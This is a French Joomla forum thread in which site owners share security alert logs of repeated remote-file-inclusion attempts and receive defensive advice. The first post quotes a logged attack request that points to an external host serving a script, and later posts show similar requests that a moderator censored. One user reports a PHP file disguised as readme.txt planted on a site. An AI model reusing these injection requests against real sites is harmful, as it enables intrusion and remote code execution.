Joomladay francophone 2018 à Paris 18 et 19 mai

Hack

Réduire
X
  • Filtrer
  • Heure
  • Afficher
Tout effacer
nouveaux messages

  • Hack

    Bonjour à tous,

    Simplement pour dire que j'ai été l'objet de tentatives de hack……
    Donc tout d'abord merci pour vos précieux conseils, puisque ces tentatives ont échoués, mais aussi pour vous montrer le rapport généré. Je ne sais pas si cela peut servir… en tous cas cette tentaives à eu lieu à plusieurs reprises, donc je me demande si je dois faire quelque chose de plus ? A force de tentatives risque t'il de reussir un jour ?

    A+

    Greg

    Le rapport :

    Une tentative de hacking commise sur www.aluminor.fr par 85.69.54.45 en appelant /index.php?option=http://ninaru.hut2.ru/images/cs.txt?

    HTTP_SERVER_VARS:

    HTTP_HOST_NAME => abo-45-54-69.rou.modulonet.fr

    CONTENT_TYPE => text/html
    DOCUMENT_ROOT => /sites/web16769/home/web16769/website
    HTTP_ACCEPT => text/html, */*
    HTTP_CONNECTION => keep-alive
    HTTP_HOST => www.aluminor.fr
    HTTP_USER_AGENT => Wget/1.1 (compatible; i486; Linux; RedHat7.3)
    REDIRECT_QUERY_STRING => option=http://ninaru.hut2.ru/images/cs.txt?
    REDIRECT_STATUS => 200
    REDIRECT_URL => /index.php
    REMOTE_ADDR => 85.69.54.45
    REMOTE_PORT => 2260
    SCRIPT_FILENAME => /sites/web16769/home/web16769/website/cgi/php4
    SERVER_ADMIN => [no address given]
    SERVER_NAME => www.aluminor.fr
    SERVER_PORT => 80
    SERVER_SOFTWARE => Apache/1.3.37 (Unix) FrontPage/5.0.2.2634 mod_ssl/2.8.28 OpenSSL/0.9.8d
    GATEWAY_INTERFACE => CGI/1.1
    SERVER_PROTOCOL => HTTP/1.1
    REQUEST_METHOD => GET
    QUERY_STRING => option=http://ninaru.hut2.ru/images/cs.txt?
    REQUEST_URI => /index.php?option=http://ninaru.hut2.ru/images/cs.txt?
    SCRIPT_NAME => /cgi/php4
    PATH_INFO => /index.php
    PATH_TRANSLATED => /sites/web16769/home/web16769/website/index.php
    PATH => /usr/local/bin:/usr/bin:/bin
    PHP_SELF => /index.php
    argv => Array
    argc => 1

  • #2
    Tentatives de Hack répétée

    Salut Artefact
    J'ai eu exactement le meme mail de la part de /index.php?option=http://XXXXXXXXXXXX/images/cs.txt?
    puis sur un autre site de la part de
    par 85.18.136.89 en appelant /index.php?option=http://XXXXXXXXXXXXXXXX/test.txt???
    puis sur un autre site de la part de
    par 222.234.1.78 en appelant /?phpbb_root_path=http://XXXXXXXXXXXXXXXX/putman1207/back.txt???
    enfin ca devient infernal. La question que tu te poses et que je me pose aussi ces tentatives risquent-elles d'aboutir un jour ?
    En tout cas MERCI pour le tuto qui permet de sécuriser les sites
    A+
    Jluc
    Dernière édition par opware2000 à 12/02/2008, 11h01 Raison: Ne mettez pas les adresses pour récupérer les hacks quand même !
    Beaucoup remercier signifie secrètement demander davantage.

    Commentaire


    • #3
      La question est : est ce que les info recueillies dans le mail peuvent être exploitées pour renforcer la sécurité ?

      A+

      Greg

      Commentaire


      • #4
        @helloz à tous...

        je viens de recevoir un mail bizarre:

        You have recieved this email in response to a PHP attack against one of our servers.
        Abuse.net reported that this is the abuse email contact for the domain name.
        Below are the details of the attack, please take appropriate action.

        Time of attack : 2008-02-11 19:09:38 GMT
        Host Attacked : 125.7.48.1
        Atacker's IP : 70.84.51.42
        Offending Script: http://www.******.fr/help/css/readme.txt

        Regards
        iVent Services Automated Security
        http://www.ivent.com.au/


        bien sûr, l'adress ip de l'attaquant n'est pas la mienne, mais mon site a bien ce fichier en question qui est en fait un php. (plus un autre: dd.txt)

        pour le moment, je vire tout.

        si vous avez des infos...
        Joomla powered Domino:DomimoD
        Un emploi en Lorraine ?:www.adh.fr
        Geek ?:BlueGeek

        Commentaire


        • #5
          Encore 2 tentative ce soir à 20 minutes d'intervalle :

          Une tentative de hacking commise sur www.gnagngna.fr par 89.2.56.250 en appelant /index.php?option=http://XXXXXXXXXXXXXXX/images/cs.txt?

          Je commence à m'inquieter… en plus c'est le site d'un client

          A+


          Greg
          Dernière édition par opware2000 à 12/02/2008, 11h01 Raison: idem

          Commentaire


          • #6
            Artefact, comme beaucoup d'entre nous,je subis des dizaines de tentatives de hacking sur mon site donc ne deviens pas parano

            Il faut juste vérifier que ton site/composants sont bien à jour, regarder les alertes de sécurités assez fréquemment et faire des sauvegardes au cas où ...

            Commentaire


            • #7
              Envoyé par Zubrowska Voir le message
              Artefact, comme beaucoup d'entre nous,je subis des dizaines de tentatives de hacking sur mon site donc ne deviens pas parano

              Il faut juste vérifier que ton site/composants sont bien à jour, regarder les alertes de sécurités assez fréquemment et faire des sauvegardes au cas où ...
              Merci

              Commentaire


              • #8
                Note de modération :
                Ne mettez pas les adresses où on peut récupérer les hacks ! Un peu de bon sens quand même, censurer le début de l'url !!!
                cours de SVT - infos scientifiques : www.nicolas-ogier.fr
                pas de demandes d'aide par mp, elles seront systématiquement refusées !

                Commentaire

                Annonce

                Réduire
                1 sur 2 < >

                C'est [Réglé] et on n'en parle plus ?

                A quoi ça sert ?
                La mention [Réglé] permet aux visiteurs d'identifier rapidement les messages qui ont trouvé une solution.

                Merci donc d'utiliser cette fonctionnalité afin de faciliter la navigation et la recherche d'informations de tous sur le forum.

                Si vous deviez oublier de porter cette mention, nous nous permettrons de le faire à votre place... mais seulement une fois
                Comment ajouter la mention [Réglé] à votre discussion ?
                1 - Aller sur votre discussion et éditer votre premier message :


                2 - Cliquer sur la liste déroulante Préfixe.

                3 - Choisir le préfixe [Réglé].


                4 - Et voilà… votre discussion est désormais identifiée comme réglée.

                2 sur 2 < >

                Assistance au forum - Outil de publication d'infos de votre site

                Compatibilité: PHP 4.1,PHP4, 5, 6DEV MySQL 3.2 - 5.5 MySQLi from 4.1 ( @ >=PHP 4.4.9)

                Support Version de Joomla! : | J!3.0 | J!2.5.xx | J!1.7.xx | J!1.6.xx | J1.5.xx | J!1.0.xx |

                Version française (FR) D'autres versions sont disponibles depuis la version originale de FPA

                UTILISER À VOS PROPRES RISQUES :
                L'exactitude et l'exhaustivité de ce script ainsi que la documentation ne sont pas garanties et aucune responsabilité ne sera acceptée pour tout dommage, questions ou confusion provoquée par l'utilisation de ce script.

                Problèmes connus :
                FPA n'est actuellement pas compatible avec des sites Joomla qui ont eu leur fichier configuration.php déplacé en dehors du répertoire public_html.

                Installation :

                1. Téléchargez l'archive souhaitée : http://afuj.github.io/FPA/

                Archive zip : https://github.com/AFUJ/FPA/zipball/master

                2. Décompressez le fichier de package téléchargé sur votre propre ordinateur (à l'aide de WinZip ou d'un outil de décompression natif).

                3. Lisez le fichier LISEZMOI inclus pour toutes les notes de versions spécifiques.

                4. LIRE le fichier de documentation inclus pour obtenir des instructions d'utilisation détaillées.

                5. Téléchargez le script fpa-fr.php à la racine de votre site Joomla!. C'est l'endroit que vous avez installé Joomla et ce n'est pas la racine principale de votre serveur. Voir les exemples ci-dessous.

                6. Exécutez le script via votre navigateur en tapant: http:// www. votresite .com/ fpa-fr.php
                et remplacer www. votresite .com par votre nom de domaine


                Exemples:
                Joomla! est installé dans votre répertoire web et vous avez installé la version française du fichier FPA:
                Télécharger le script fpa-fr.php dans: /public_html/
                Pour executer le script: http://www..com/fpa-fr.php

                Joomla! est installé dans un sous-répertoire nommé "cms" et vous avez installé la version française du fichier FPA:
                Télécharger le script fpa-fr.php dans: /public_html/cms/
                Pour executer le script: http://www..com/cms/fpa-fr.php

                En raison de la nature très sensible de l'information affichée par le script FPA, il doit être retiré immédiatement du serveur après son utilisation.

                Pour supprimer le script de votre site, utilisez le lien de script de suppression fourni en haut de la page du script. Si le lien de suppression échoue pour supprimer le script, utilisez votre programme FTP pour le supprimer manuellement ou changer le nom une fois que le script a généré les données du site et le message publié sur le forum. Si le script est toujours présent sur le site, il peut être utilisé pour recueillir suffisamment d'informations pour pirater votre site. Le retrait du script empêche des étrangers de l'utiliser pour jeter un oeil à la façon dont votre site est structuré et de détecter les défauts qui peuvent être utilisé à vos dépends.
                Voir plus
                Voir moins
                Travaille ...
                X